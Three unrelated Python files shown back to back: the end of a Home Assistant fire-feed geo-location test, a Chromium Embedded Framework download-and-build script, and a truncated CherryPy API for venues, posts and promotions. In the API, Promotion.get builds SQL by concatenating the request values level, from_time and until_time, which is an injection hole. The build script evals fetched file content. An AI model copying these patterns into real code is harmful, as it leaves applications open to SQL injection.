ATTR_LONGITUDE: 150.0,
ATTR_FRIENDLY_NAME: "Title 1",
ATTR_CATEGORY: "Category 1",
ATTR_LOCATION: "Location 1",
ATTR_ATTRIBUTION: "Attribution 1",
ATTR_PUBLICATION_DATE: datetime.datetime(
2018, 9, 22, 8, 0, tzinfo=datetime.timezone.utc
),
ATTR_FIRE: True,
ATTR_COUNCIL_AREA: "Council Area 1",
ATTR_STATUS: "Status 1",
ATTR_TYPE: "Type 1",
ATTR_SIZE: "Size 1",
ATTR_RESPONSIBLE_AGENCY: "Agency 1",
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: "nsw_rural_fire_service_feed",
ATTR_ICON: "mdi:fire",
}
assert round(abs(float(state.state) - 15.5), 7) == 0
state = hass.states.get("geo_location.title_2")
assert state is not None
assert state.name == "Title 2"
assert state.attributes == {
ATTR_EXTERNAL_ID: "2345",
ATTR_LATITUDE: -31.1,
ATTR_LONGITUDE: 150.1,
ATTR_FRIENDLY_NAME: "Title 2",
ATTR_FIRE: False,
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: "nsw_rural_fire_service_feed",
ATTR_ICON: "mdi:alarm-light",
}
assert round(abs(float(state.state) - 20.5), 7) == 0
state = hass.states.get("geo_location.title_3")
assert state is not None
assert state.name == "Title 3"
assert state.attributes == {
ATTR_EXTERNAL_ID: "3456",
ATTR_LATITUDE: -31.2,
ATTR_LONGITUDE: 150.2,
ATTR_FRIENDLY_NAME: "Title 3",
ATTR_FIRE: True,
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: "nsw_rural_fire_service_feed",
ATTR_ICON: "mdi:fire",
}
assert round(abs(float(state.state) - 25.5), 7) == 0
# Simulate an update - one existing, one new entry,
# one outdated entry
mock_feed.return_value.update.return_value = (
"OK",
[mock_entry_1, mock_entry_4, mock_entry_3],
)
async_fire_time_changed(hass, utcnow + SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
# Simulate an update - empty data, but successful update,
# so no changes to entities.
mock_feed.return_value.update.return_value = "OK_NO_DATA", None
async_fire_time_changed(hass, utcnow + 2 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
# Simulate an error - removes all entities
mock_feed.return_value.update.return_value = "ERROR", None
async_fire_time_changed(hass, utcnow + 3 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 0
async def test_setup_with_custom_location(hass):
"""Test the setup with a custom location."""
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry("1234", "Title 1", 20.5, (-31.1, 150.1))
with patch(
"geojson_client.nsw_rural_fire_service_feed." "NswRuralFireServiceFeed"
) as mock_feed:
mock_feed.return_value.update.return_value = "OK", [mock_entry_1]
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(
hass, geo_location.DOMAIN, CONFIG_WITH_CUSTOM_LOCATION
)
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 1
assert mock_feed.call_args == call(
(15.1, 25.2), filter_categories=[], filter_radius=200.0
)
| |
# Copyright (c) 2012 The Chromium Embedded Framework Authors. All rights
# reserved. Use of this source code is governed by a BSD-style license that
# can be found in the LICENSE file.
from optparse import OptionParser
from subprocess import Popen, PIPE, STDOUT
from tempfile import mktemp
import os
import shlex
import shutil
import sys
import urllib
# default URL values
chromium_url = 'http://git.chromium.org/chromium/src.git'
depot_tools_url = 'http://src.chromium.org/svn/trunk/tools/depot_tools'
def check_url(url):
""" Check the URL and raise an exception if invalid. """
if ':' in url[:7]:
parts = url.split(':', 1)
if (parts[0] in ["http", "https", "git"] and \
parts[1] == urllib.quote(parts[1])):
return url
sys.stderr.write('Invalid URL: '+url+"\n")
raise Exception('Invalid URL: '+url)
def get_exec_environ():
# Copy so repeated calls do not keep prepending to the process PATH.
env = os.environ.copy()
env['PATH'] = depot_tools_dir + os.pathsep + env['PATH']
return env
def run(args, **kwargs):
"""Run a command and capture the output iteratively."""
if isinstance(args, str):
args = shlex.split(args.replace('\\', '\\\\'))
cwd = kwargs.get("cwd", os.getcwd())
quiet = kwargs.get("quiet", False)
print "-> Running '%s' in %s" % (" ".join(args), os.path.relpath(cwd))
cmd = Popen(args, cwd=cwd, stdout=PIPE, stderr=STDOUT,
env=kwargs.get("env", get_exec_environ()),
shell=(sys.platform == 'win32'))
output = ''
while True:
out = cmd.stdout.read(1)
if out == '' and cmd.poll() is not None:
break
output += out
if not quiet:
sys.stdout.write(out)
if cmd.wait() != 0:
raise Exception("Command failed: \"%s\"" % " ".join(args), output)
return output
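# Example usage (hypothetical command): capture the output quietly and
# reuse the returned string.
#   version = run('git --version', cwd=download_dir, quiet=True)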
def get_current_branch(path):
return run("git rev-parse --abbrev-ref HEAD", cwd=path, quiet=True)
def get_chromium_compat_rev(cef_url, path, cef_rev):
if not os.path.isdir(path):
path = mktemp()
run("git clone --depth 1 %s %s" % (cef_url, path), quiet = True)
if cef_rev == "None":
cef_rev = get_git_rev(path, get_current_branch(path))
compat_cmd = "git cat-file -p %s:CHROMIUM_BUILD_COMPATIBILITY.txt" % cef_rev
compat_value = run(compat_cmd, cwd = path, quiet = True)
config = eval(compat_value, {'__builtins__': None}, None)
if not 'chromium_revision' in config:
raise Exception("Missing chromium_revision value")
return str(int(config['chromium_revision']))
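# The compatibility file is expected to eval to a plain dict literal along
# the lines of (illustrative value): {'chromium_revision': '123456'}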
def get_svn_rev(path, branch):
svn_rev = "None"
cmd = ("git log --grep=^git-svn-id: -n 1 %s" % branch).split()
try:
process = Popen(cmd, cwd=path, stdout = PIPE, stderr = PIPE)
for line in process.stdout:
if line.find("git-svn-id") > 0:
svn_rev = line.split("@")[1].split()[0]
break
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return svn_rev
def get_git_rev_for_svn_rev(path, svn_rev):
git_rev = "None"
cmd = ("git log --grep=^git-svn-id:.*@%s --oneline" % svn_rev).split()
try:
process = Popen(cmd, cwd=path, stdout = PIPE, stderr = PIPE)
git_rev = process.communicate()[0].split()[0]
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return git_rev
def get_git_rev(path, branch):
git_rev = "None"
cmd = ("git describe --always %s" % branch).split()
try:
process = Popen(cmd, cwd=path, stdout = PIPE, stderr = PIPE)
git_rev = process.communicate()[0].strip()
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return git_rev
def get_git_origin(path):
git_origin = "None"
get_origin_cmd = "git remote show origin -n".split()
try:
process = Popen(get_origin_cmd, cwd=path, stdout = PIPE, stderr = PIPE)
for line in process.stdout:
if line.startswith(" Fetch URL: "):
git_origin = line.replace(" Fetch URL: ", "").strip()
break
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return git_origin
def get_checkout_info(path, fetch_latest = True):
""" Retrieves the origin URL, git HEAD revision and last SVN revision """
url = 'None'
origin_svn_rev = 'None'
origin_git_rev = 'None'
local_svn_rev = 'None'
local_git_rev = 'None'
if os.path.isdir(path):
if fetch_latest:
run("git fetch", cwd = path, quiet = True)
url = get_git_origin(path)
branch = get_current_branch(path)
origin_svn_rev = get_svn_rev(path, "origin/%s" % branch)
origin_git_rev = get_git_rev(path, "origin/%s" % branch)
local_svn_rev = get_svn_rev(path, branch)
local_git_rev = get_git_rev(path, branch)
return {
'url' : url,
'local' : {
'svn-revision' : local_svn_rev,
'git-revision' : local_git_rev
},
'origin' : {
'svn-revision' : origin_svn_rev,
'git-revision' : origin_git_rev
}
}
def onerror(func, path, exc_info):
"""
Error handler for ``shutil.rmtree``.
If the error is due to an access error (read only file)
it attempts to add write permission and then retries.
If the error is for another reason it re-raises the error.
Usage : ``shutil.rmtree(path, onerror=onerror)``
"""
import stat
if not os.access(path, os.W_OK):
# Is the error an access error ?
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise
# cannot be loaded as a module
if __name__ != "__main__":
sys.stderr.write('This file cannot be loaded as a module!')
sys.exit()
# parse command-line options
desc = """
This utility implements automation for the download, update, build and
distribution of CEF.
"""
parser = OptionParser(description=desc)
parser.add_option('--url', dest='url',
help='CEF source URL')
parser.add_option('--download-dir', dest='downloaddir', metavar='DIR',
help='download directory with no spaces [required]')
parser.add_option('--revision', dest='revision',
help='CEF source revision')
parser.add_option('--force-config',
action='store_true', dest='forceconfig', default=False,
help='force Chromium configuration')
parser.add_option('--force-clean',
action='store_true', dest='forceclean', default=False,
help='force revert of all Chromium changes, deletion of '+\
'all unversioned files including the CEF folder and '+\
'trigger the force-update, force-build and '+\
'force-distrib options')
parser.add_option('--force-update',
action='store_true', dest='forceupdate', default=False,
help='force Chromium and CEF update')
parser.add_option('--force-build',
action='store_true', dest='forcebuild', default=False,
help='force CEF debug and release builds')
parser.add_option('--force-distrib',
action='store_true', dest='forcedistrib', default=False,
help='force creation of CEF binary distribution')
parser.add_option('--no-debug-build',
action='store_true', dest='nodebugbuild', default=False,
help="don't perform the CEF debug build")
parser.add_option('--no-release-build',
action='store_true', dest='noreleasebuild', default=False,
help="don't perform the CEF release build")
parser.add_option('--no-distrib',
action='store_true', dest='nodistrib', default=False,
help="don't create the CEF binary distribution")
(options, args) = parser.parse_args()
# the downloaddir and url options are required
if options.downloaddir is None:
print "ERROR: Download directory is required"
parser.print_help(sys.stderr)
sys.exit()
if options.url is None:
print "ERROR: CEF URL is required"
parser.print_help(sys.stderr)
sys.exit()
cef_url = check_url(options.url)
download_dir = os.path.abspath(options.downloaddir)
if not os.path.exists(download_dir):
# create the download directory
os.makedirs(download_dir)
# Test the operating system.
platform = ''
if sys.platform == 'win32':
platform = 'windows'
elif sys.platform == 'darwin':
platform = 'macosx'
elif sys.platform.startswith('linux'):
platform = 'linux'
# set the expected script extension
if platform == 'windows':
script_ext = '.bat'
else:
script_ext = '.sh'
# check if the "depot_tools" directory exists
depot_tools_dir = os.path.join(download_dir, 'depot_tools')
if not os.path.exists(depot_tools_dir):
# checkout depot_tools
run('svn checkout %s %s' % (depot_tools_url, depot_tools_dir),
cwd = download_dir, quiet = True)
chromium_dir = os.path.join(download_dir, 'chromium')
if not os.path.exists(chromium_dir):
# create the "chromium" directory
os.makedirs(chromium_dir)
chromium_src_dir = os.path.join(chromium_dir, 'src')
cef_src_dir = os.path.join(chromium_src_dir, 'cef')
cef_tools_dir = os.path.join(cef_src_dir, 'tools')
# retrieve the current CEF URL and revision
info = get_checkout_info(cef_src_dir)
cef_rev = info['origin']['git-revision']
if not options.revision is None:
cef_rev = str(options.revision)
current_cef_url = info['url']
current_cef_rev = info['local']['git-revision']
# retrieve the compatible Chromium revision
chromium_rev = get_chromium_compat_rev(cef_url, cef_src_dir, cef_rev)
# retrieve the current Chromium URL and revision
info = get_checkout_info(chromium_src_dir, False)
current_chromium_url = info['url']
current_chromium_rev = info['local']['svn-revision']
# test if the CEF URL changed
cef_url_changed = current_cef_url != cef_url
print "-- CEF URL: %s" % current_cef_url
if cef_url_changed:
print "\t-> CHANGED TO: %s" % cef_url
# test if the CEF revision changed
cef_rev_changed = current_cef_rev != cef_rev
print "-- CEF Revision: %s" % current_cef_rev
if cef_rev_changed:
print "\t-> CHANGED TO: %s" % cef_rev
# test if the Chromium URL changed
chromium_url_changed = current_chromium_url != chromium_url
print "-- Chromium URL: %s" % current_chromium_url
if chromium_url_changed:
print "\t-> CHANGED TO: %s" % chromium_url
# test if the Chromium revision changed
chromium_rev_changed = current_chromium_rev != chromium_rev
print "-- Chromium Revision: %s" % current_chromium_rev
if chromium_rev_changed:
print "\t-> CHANGED TO: %s" % chromium_rev
# true if anything changed
any_changed = chromium_url_changed or chromium_rev_changed or \
cef_url_changed or cef_rev_changed
if not any_changed:
print "*** NO CHANGE ***"
if chromium_url_changed or options.forceconfig:
# run gclient config to create the .gclient file
run('gclient config %s --git-deps' % chromium_url, cwd = chromium_dir)
path = os.path.join(chromium_dir, '.gclient')
if not os.path.exists(path):
raise Exception('.gclient file was not created')
# read the resulting .gclient file
fp = open(path, 'r')
data = fp.read()
fp.close()
# populate "custom_deps" section
data = data.replace('"custom_deps" : {', '"custom_deps" : {'+\
"\n "+'"src/third_party/WebKit/LayoutTests": None,'+\
"\n "+'"src/chrome_frame/tools/test/reference_build/chrome": None,'+\
"\n "+'"src/chrome/tools/test/reference_build/chrome_mac": None,'+\
"\n "+'"src/chrome/tools/test/reference_build/chrome_win": None,'+\
"\n "+'"src/chrome/tools/test/reference_build/chrome_linux": None,')
# write the new .gclient file
fp = open(path, 'w')
fp.write(data)
fp.close()
if options.forceclean:
if os.path.exists(chromium_src_dir):
# revert all Chromium changes and delete all unversioned files
run('gclient revert -n', cwd = chromium_dir)
# remove the build output directories
output_dirs = []
if platform == 'windows':
output_dirs.append(os.path.join(chromium_src_dir, 'build\\Debug'))
output_dirs.append(os.path.join(chromium_src_dir, 'build\\Release'))
elif platform == 'macosx':
output_dirs.append(os.path.join(chromium_src_dir, 'xcodebuild'))
elif platform == 'linux':
output_dirs.append(os.path.join(chromium_src_dir, 'out'))
for output_dir in output_dirs:
if os.path.exists(output_dir):
shutil.rmtree(output_dir, onerror=onerror)
# force update, build and distrib steps
options.forceupdate = True
options.forcebuild = True
options.forcedistrib = True
if chromium_url_changed or chromium_rev_changed or options.forceupdate:
# download/update the Chromium source code
fetch_rev = "HEAD"
if os.path.isdir(chromium_src_dir):
fetch_rev = get_git_rev_for_svn_rev(
chromium_src_dir, current_chromium_rev)
run('gclient sync --jobs 8 -n --force --revision=src@%s' % fetch_rev,
cwd = chromium_dir)
checkout_rev = get_git_rev_for_svn_rev(chromium_src_dir, chromium_rev)
run('gclient sync --jobs 8 --revision=src@%s' % checkout_rev,
cwd = chromium_dir)
if not os.path.exists(cef_src_dir) or cef_url_changed:
if cef_url_changed and os.path.exists(cef_src_dir):
# delete the cef directory (it will be re-downloaded)
shutil.rmtree(cef_src_dir)
# download the CEF source code
run("git clone %s %s" % (cef_url, cef_src_dir))
elif cef_rev_changed or options.forceupdate:
# update the CEF source code
stashed = run("git stash", cwd = cef_src_dir).find(
"No local changes to save") < 0
ref = cef_rev
if ref == "None":
ref = "origin/%s" % get_current_branch(cef_src_dir)
run("git fetch origin", cwd = cef_src_dir)
run("git reset --hard %s" % ref, cwd = cef_src_dir)
if stashed:
run("git stash pop", cwd = cef_src_dir)
if any_changed or options.forceupdate:
# create CEF projects
path = os.path.join(cef_src_dir, 'cef_create_projects' + script_ext)
run(path, cwd = cef_src_dir, quiet = True)
if any_changed or options.forcebuild:
path = os.path.join(cef_tools_dir, 'build_projects' + script_ext)
if not options.nodebugbuild:
run(path +' Debug', cwd = cef_tools_dir)
if not options.noreleasebuild:
run(path +' Release', cwd = cef_tools_dir)
if any_changed or options.forcedistrib:
if not options.nodistrib:
# make CEF binary distribution
path = os.path.join(cef_tools_dir, 'make_distrib' + script_ext)
run(path, cwd = cef_tools_dir)
| |
import email.mime.text
import hashlib
import json
import math
import os
import smtplib
import cherrypy
import azureutil
import util
import v2.main
class Confirm:
@util.expose
@util.db
def index(self, cursor=None, venue_id=None, user_id=None, hashd=None,
**kwargs):
if not venue_id or not user_id or not hashd:
return 'Error!'
qry = {'select': ('name', 'email', 'phone', 'website'),
'table': 'venues',
'where': ('id = ?')}
cursor.execute(util.query(**qry), (venue_id,))
venue = cursor.fetchone()
if not venue:
return 'Error!'
qry = {'select': ('forename', 'surname'),
'table': 'users',
'where': ('id = ?')}
cursor.execute(util.query(**qry), (user_id,))
user = cursor.fetchone()
if not user:
return 'Error!'
if hashd != hashlib.md5(venue.email + '|' + str(venue_id) + '|' + str(user_id) + '|confirm|' + os.environ['APP_SECRET']).hexdigest():
return 'Error!'
qry = {'update': 'venues',
'set_values': ('email_verified'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (1, venue_id))
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'email_confirmed.txt'), 'rb') as f:
msg = f.read()
msg = msg.replace('[EmailAddress]', venue.email)
msg = msg.replace('[PhoneNumber]', venue.phone)
msg = msg.replace('[Website]', venue.website)
msg = msg.replace('[Name]', user.forename + ' ' + user.surname)
msg = msg.replace('[VenueName]', venue.name)
subject = 'Thanks for verifying [EmailAddress], we will now complete the verification of [VenueName]'
subject = subject.replace('[EmailAddress]', venue.email)
subject = subject.replace('[VenueName]', venue.name)
msg = email.mime.text.MIMEText(msg)
msg['Subject'] = subject
msg['From'] = os.environ['EMAIL']
msg['To'] = venue.email
s = smtplib.SMTP(os.environ['SMTP_SERVER'])
s.ehlo()
s.starttls()
s.ehlo()
s.login(os.environ['SMTP_USER'], os.environ['SMTP_PASS'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
return 'Confirmed.'
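# Sketch of the matching link generation (assumption: the verification email
# builds its hash the same way the check above expects):
#   def make_confirm_hash(venue_email, venue_id, user_id):
#       return hashlib.md5(venue_email + '|' + str(venue_id) + '|' +
#                          str(user_id) + '|confirm|' +
#                          os.environ['APP_SECRET']).hexdigest()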
class Image:
@util.expose
@util.protect
@util.db
@util.auth
def get(self, cursor=None, user_id=None, entity=None, entity_id=None,
**kwargs):
if not entity or not entity_id:
raise cherrypy.HTTPError(404)
if entity == 'venue':
entity = 'post'
venue_id = entity_id
subqry = {'select': 'COUNT(id)',
'table': 'post_reports',
'where': ('post_id = posts.id')}
qry = {'select': ('id', 'venue_id', 'time'),
'table': 'posts',
'where': ('venue_id = ?', 'hidden = 0',
'(' + util.query(**subqry) + ') < 3' #,
#'time > ' + str(util.now() - 691200)),
),
'order_by': 'time DESC',
'limit': 50}
cursor.execute(util.query(**qry), (entity_id,))
try:
entity_id = str(cursor.fetchone().id)
qry = {'insert_into': 'venue_loads',
'columns': ('user_id', 'venue_id', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, util.now()))
image = azureutil.retrieve(entity, entity_id)
if not image:
image = cherrypy.thread_data.placeholder_image
except:
image = cherrypy.thread_data.placeholder_image
else:
image = azureutil.retrieve(entity, entity_id)
if not image:
image = cherrypy.thread_data.placeholder_image
#if image:
# cherrypy.response.headers['Content-Type'] = 'image/jpeg'
# return image
cherrypy.response.headers['Content-Type'] = 'image/jpeg'
return image
#raise cherrypy.HTTPError(404)
class Post:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, venue_id=None, **kwargs):
if venue_id:
subqry = {'select': 'COUNT(id)',
'table': 'post_reports',
'where': ('post_id = posts.id')}
qry = {'select': ('posts.id', 'user_id', 'posts.venue_id', 'caption',
'time', 'hidden', 'users.forename',
'users.surname'),
'left_join': 'users',
'on': 'posts.user_id = users.id',
'table': 'posts',
'where': ('posts.venue_id = ?', 'hidden = 0',
'(' + util.query(**subqry) + ') < 3' #,
#'time > ' + str(util.now() - 691200)),
),
'order_by': 'time DESC',
'limit': 50}
cursor.execute(util.query(**qry), (venue_id,))
else:
qry = {'select': ('posts.id', 'venues.name', 'posts.time'),
'left_join': 'venues',
'on': 'posts.venue_id = venues.id',
'table': 'posts',
'where': ('posts.user_id = ?'),
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (user_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, caption=None,
hide=None, post_id=None, image=None, **kwargs):
if post_id and util.to_bool(hide):
qry = {'update': 'posts',
'set_values': ('hidden'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), ('1', post_id))
return post_id
else:
qry = {'insert_into': 'posts',
'columns': ('user_id', 'venue_id', 'caption', 'time')}
cursor.execute(util.query(**qry), (user_id, venue_id, caption,
util.now()))
cursor.execute(util.query(last_id=True))
post_added = int(cursor.fetchone().identity)
azureutil.store(image.file, 'post', str(post_added))
return post_added
class PostLike:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, **kwargs):
qry = {'select': 'id',
'table': 'post_likes',
'where': ('user_id = ?', 'post_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, post_id))
res = cursor.fetchone()
if not res:
qry = {'insert_into': 'post_likes',
'columns': ('user_id', 'post_id', 'time')}
cursor.execute(util.query(**qry), (user_id, post_id, util.now()))
return True
class PostReport:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, **kwargs):
qry = {'select': 'id',
'table': 'post_reports',
'where': ('user_id = ?', 'post_id = ?'),
'order_by': 'id',
'limit': 1}
cursor.execute(util.query(**qry), (user_id, post_id))
res = cursor.fetchone()
if not res:
qry = {'insert_into': 'post_reports',
'columns': ('user_id', 'post_id')}
cursor.execute(util.query(**qry), (user_id, post_id))
return True
class PostShare:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, media_id=None,
**kwargs):
qry = {'insert_into': 'post_shares',
'columns': ('user_id', 'post_id', 'media_id', 'time')}
cursor.execute(util.query(**qry), (user_id, post_id, media_id,
util.now()))
return True
class PostView:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, post_id=None, **kwargs):
qry = {'insert_into': 'post_views',
'columns': ('user_id', 'post_id')}
cursor.execute(util.query(**qry), (user_id, post_id))
return True
class Promotion:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, venue_id=None, getall=None,
level=None, from_time=None, until_time=None, **kwargs):
red = {'select': 'COUNT(id)',
'table': 'promotion_redemptions',
'where': 'promotion_id = promotions.id'}
promo_qry = {'select': ['id', 'title', 'description',
'passcode', 'start', '[end]', 'maximum',
'creator', 'level',
'(' + util.query(**red) + ') AS redemptions'],
'table': 'promotions',
'where': ['venue_id = ?', 'hidden != 1'],
'order_by': 'id DESC'}
if from_time and until_time:
own_red = {'select': 'COUNT(id)',
'table': 'promotion_redemptions',
'where': ('promotion_id = promotions.id', 'time >= ' + from_time, 'time < ' + until_time, 'user_id = ' + str(user_id))}
promo_qry['select'].append('(' + util.query(**own_red) + ') AS own_redemptions')
if not util.to_bool(getall):
promo_qry['limit'] = 1
promo_qry['where'].append(str(util.now()) + ' >= start')
promo_qry['where'].append('([end] = 0 OR [end] > ' + str(util.now()) + ')')
promo_qry['where'].append('(maximum = 0 OR (' + util.query(**red) + ') < maximum)')
promo_qry['where'].append(level + ' >= level')
promo_qry['order_by'] = 'level DESC, id DESC'
cursor.execute(util.query(**promo_qry), (venue_id,))
row = cursor.fetchone()
if row:
return {t[0]: val for t, val in zip(cursor.description, row)}
else:
return None
cursor.execute(util.query(**promo_qry), (venue_id,))
return [util.row_to_dict(cursor, row) for row in cursor.fetchall()]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, venue_id=None, delete=None,
promotion_id=None, title=None, description=None, start=None,
end=None, maximum=None, passcode=None, level=None, **kwargs):
if util.to_bool(delete) and promotion_id:
qry = {'update': 'promotions',
'set_values': ('hidden'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (1, promotion_id))
elif promotion_id:
qry = {'update': 'promotions',
'set_values': ('title', 'description', 'start', '[end]',
'maximum', 'passcode', 'venue_id', 'level'),
'where': 'id = ?'}
cursor.execute(util.query(**qry), (title, description, start, end,
maximum, passcode, venue_id,
level, promotion_id))
else:
qry = {'insert_into': 'promotions',
'columns': ('title', 'description', 'start', '[end]',
'maximum', 'creator', 'passcode',
'venue_id', 'level')}
cursor.execute(util.query(**qry), (title, description, start, end,
maximum, user_id, passcode,
venue_id, level))
return True
class PromotionRedemption:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, **kwargs):
qry = {'select': ('venues.name', 'promotion_redemptions.time',
'promotions.passcode', 'promotions.description'),
'left_join': ('promotions', 'venues'),
'on': ('promotion_redemptions.promotion_id = promotions.id', 'venues.id = promotions.venue_id'),
'table': 'promotion_redemptions',
'where': ('promotion_redemptions.user_id = ?'),
'order_by': 'time DESC'}
cursor.execute(util.query(**qry), (user_id,))
return [util.row_to_dict(cursor, row) for row in cursor]
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def set(self, cursor=None, user_id=None, promotion_id=None, **kwargs):
cnt = {'select': ('COUNT(id)'),
'table': 'promotion_redemptions',
'where': ('promotion_id = promotions.id')}
promo = {'select': ('[end]', 'maximum', 'passcode',
'(' + util.query(**cnt) + ') AS count'),
'table': 'promotions',
'where': ('id = ?')}
cursor.execute(util.query(**promo), (promotion_id,))
row = cursor.fetchone()
if int(row.end) != 0 and int(row.end) < util.now():
return 'time'
if int(row.maximum) != 0 and int(row.count) >= int(row.maximum):
return 'number'
qry = {'insert_into': 'promotion_redemptions',
'columns': ('user_id', 'promotion_id', 'time')}
cursor.execute(util.query(**qry), (user_id, promotion_id, util.now()))
return row.passcode
class Ranking:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, **kwargs):
t = self.thresholds(cursor)
posts_total = {'select': 'COUNT(id) AS count',
'table': 'posts',
'where': 'user_id = ?'}
cursor.execute(util.query(**posts_total), (user_id,))
posts_total = cursor.fetchone().count
following_total = {'select': 'COUNT(id) AS count',
'table': 'venue_followers',
'where': 'user_id = ?'}
cursor.execute(util.query(**following_total), (user_id,))
following_total = cursor.fetchone().count
redemptions_total = {'select': 'COUNT(id) AS count',
'table': 'promotion_redemptions',
'where': 'user_id = ?'}
cursor.execute(util.query(**redemptions_total), (user_id,))
redemptions_total = cursor.fetchone().count
posts = {'select': 'COUNT(id) AS count',
'table': 'posts',
'where': ('user_id = ?', 'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**posts), (user_id,))
posts = cursor.fetchone().count
comments = {'select': 'COUNT(id) AS count',
'table': 'venue_comments',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**comments), (user_id,))
comments = cursor.fetchone().count
likes = {'select': 'COUNT(id) AS count',
'table': 'post_likes',
'where': ('user_id = ?', 'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**likes), (user_id,))
likes = cursor.fetchone().count
redemptions = {'select': 'COUNT(id) AS count',
'table': 'promotion_redemptions',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**redemptions), (user_id,))
redemptions = cursor.fetchone().count
share_venue = {'select': 'COUNT(id) AS count',
'table': 'venue_shares',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**share_venue), (user_id,))
share_venue = cursor.fetchone().count
share_posts = {'select': 'COUNT(id) AS count',
'table': 'post_shares',
'where': ('user_id = ?',
'time >' + str(util.now() - 2592000))}
cursor.execute(util.query(**share_posts), (user_id,))
share_posts = cursor.fetchone().count
score = ((share_posts + share_venue) * 5 + posts * 4 + comments * 2 + likes * 2)
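# Worked example (illustrative numbers): 2 shares, 3 posts, 1 comment and
# 4 likes in the last 30 days give score = 2*5 + 3*4 + 1*2 + 4*2 = 32.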
for threshold in range(len(t)):
if score < t[threshold]:
res = threshold
break
else:
res = 3
return {'thresholds': t,
'level': res,
'posts_total': posts_total,
'following_total': following_total,
'redemptions_total': redemptions_total,
'posts': posts,
'redemptions': redemptions,
'share': share_posts + share_venue,
'rsvps': 0,
'comments': comments,
'likes': likes,
'score': score}
def thresholds(self, cursor):
users = {'select': 'COUNT(id) AS count', 'table': 'users'}
cursor.execute(util.query(**users))
users = cursor.fetchone().count
thresholds = []
for percent in (0.8, 0.95, 0.99):
number = math.floor(percent * users)
venue_shares = {'select': 'COUNT(id)',
'table': 'venue_shares',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
post_shares = {'select': 'COUNT(id)',
'table': 'post_shares',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
comments = {'select': 'COUNT(id)',
'table': 'venue_comments',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
likes = {'select': 'COUNT(id)',
'table': 'post_likes',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
posts = {'select': 'COUNT(id)',
'table': 'posts',
'where': ('user_id = users.id',
'time > ' + str(util.now() - 2592000))}
thresholdqry = {'select': ('((' + util.query(**venue_shares) + ') * 5 + ' +
'(' + util.query(**post_shares) + ') * 5 + ' +
'(' + util.query(**posts) + ') * 4 + ' +
'(' + util.query(**comments) + ') * 2 + ' +
'(' + util.query(**likes) + ') * 2) AS count',),
'table': 'users',
'group_by': 'id',
'order_by': 'count',
'limit': (number - 1, 1)}
cursor.execute(util.query(**thresholdqry))
count = cursor.fetchone()
thresholds.append(count.count if count else 0)
return thresholds
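# Illustrative reading (assumed interpretation): with 1,000 users the 0.8,
# 0.95 and 0.99 cut-offs take the 30-day activity score of the users ranked
# 800th, 950th and 990th by ascending score, so levels 1-3 roughly mark the
# top 20%, 5% and 1% of users.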
class User:
@util.expose
@util.protect
@util.db
@util.auth
@util.jsonp
def get(self, cursor=None, user_id=None, term=None, **kwargs):
return self.retrieve(cursor=cursor, user_id=user_id, term=term)
def retrieve(self, cursor=None, user_id=None, term=None):
if util.to_bool(term):
qry = {'select': ['id',
'facebook_id',
'forename',
'surname'
],
'table': 'users',
'where': ("CONCAT(forename, \' \', surname) LIKE ?",),
'order_by': 'surname ASC, forename ASC'}
cursor.execute(util.query(**qry), ("%" + term.replace(' ', "%") + "%",))
return [util.row_to_dict(cursor, row) for row in cursor]
else:
